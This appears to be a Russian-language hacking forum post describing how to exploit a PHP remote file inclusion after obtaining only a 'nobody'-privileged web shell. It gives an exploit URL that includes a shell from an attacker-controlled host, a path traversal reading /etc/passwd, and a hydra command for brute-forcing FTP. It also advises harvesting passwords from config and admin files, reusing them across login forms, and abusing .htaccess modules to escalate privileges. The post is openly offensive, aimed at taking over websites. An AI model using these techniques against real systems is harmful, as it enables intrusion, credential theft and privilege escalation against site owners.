[into]
Итак... многие из нас сталкивались с слишком "Бесправным удаленным инклудом"...
Код:
wwwsite/index.php?url=fuck
в коде есть Include ("$index.php")
все нормально, без приколов с расширениями имеем удаленный инклуд
Код:
wwwsite/index.php?url=http://my.ru/shell.php
есть шелл...
Пытаемся что-то изменить и... Опа у нас права NOBODY => мы ничего не имеем кроме просмотра... Всякие ламочки сразу бросят это дело... Я предлагаю разобраться, что мы можем сделать... Сейчас админы умнеют, и на инклудах урезают права.
[возможности]
Сразу могу сказать, что имея шелл с правами Nobody - это тоже довольно серьезно... Мы легко видим структуру сайта, можно найти и читать много интересного-это оооочень важно... Нам открываются большие возможности... пошли попорядку...
[этот злобный etc]
Многие задавали вопросы типа что такое etc, etc/passwd и что можно из этого получит?
может я кого и разочарую, но я скажу, что из etc вы нихрена не получите, ибо заманчивая фраза passwd ниочем еще не говорит, это всего лишь список юзерей, но это все относительно...
Код:
wwwsite/index.php?url=../../../../../../../../../../etc/passwd
на самом деле этой штукой можно осуществлять брутфорс атаки... Используя юзера из etc можно брутить админки, панели... Но чаще всего это используются для брута фтп. Для таких целей рекомендую hydra
обычно используют либо самые частоиспользуемые пассворды, либо комбинацию user:user, либо добытые пароли добытые в ходе взлома.
Код:
hydra -L name.txt -P passwds.txt -v -V -o result.txt -t 4 site.com ftp
можно легко менять настройки брута для того, чтобы можно было обходить ограничения введенные для "обрезания крыльев" хакеру.
ну тут все ясно...
[добыча интересных данных]

итак мы нашли папку /admin лезем в наш бесправный шелл и смотрим её содержимое. видим index.php login.php сразу незадумываясь летим читать содержимое этих файлов, мы спокойно можем обнаружить там пароль для того, чтобы успешно залогиниться в админке(редко, но бывает, когда парли хранятся в файле а не в базе данных). "Зачем это нужно?" Глупый вопрос гораздо умнее спросить "Зачем нам шелл с nobody??" вот и правильно нам нужны права лучше поэтому если нашли пароль от админки смотрим внутри нельзя ли где-нить оставить свой файл, может там будут у нас лучше права? В большинстве случаев да... Ну а если в админке нет ничего толкового, тогда летим с этим паролем и добавляем логин и пароль в список для брута ftp.
[файлы конфига]

на них стоит обратить особое внимание... Обычно в этих файлах хранят пароли и логины для коннекта к бд... config.php config.inc config.inc.php подцепляем их шелом и читаем, если есть полезные данные, то вперед-> пробуем коннект к бд обычно разрешено только локально... Но у нас есть шелл а значит есть и возможность для коннекта. Если же возможностей нет, то также добавляем в список для брута ftp. Хочу обратить внимание, что bruteforce нужно проводить не только ftp но и всех остальных полей авторизации... Это тоже важный момент, малоли добытые пароли подойдут, когда мы будем вводить их на форуме, которые установлен на рассматриваемом нами ресурсе. Это пример. Полей авторизации может быть очень много...
[секреты .htacess и им подобных файлов]

на них тоже стоит обратить внимание... Часто бывает, что админ использует всякие моды как полезные, так и никчемные, но они нам могут пригодится... С помощью некоторых модов можно добиться выполнения shell команд с приличными правами... Главное граммотно изучить содержимое таких файлов...
[вывод]

бейтесь за свои права не смотря ни на что =D и не стоит кидать незаконченное дело... У нас много возможстей стоит обрабатывать каждый вариант...
Остается пожелать всем root'a и попращаться.